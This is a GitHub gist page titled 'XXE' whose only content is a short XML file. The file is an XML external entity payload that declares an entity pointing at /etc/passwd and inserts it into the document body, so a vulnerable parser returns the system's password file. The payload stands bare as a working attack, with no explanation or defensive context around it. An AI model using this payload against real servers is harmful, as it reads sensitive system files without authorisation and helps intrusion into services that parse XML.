Skip to content

Instantly share code, notes, and snippets.

@jht5945

jht5945/xxe.xml Secret

Created October 20, 2014 13:24
XXE
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<foo>&xxe;</foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment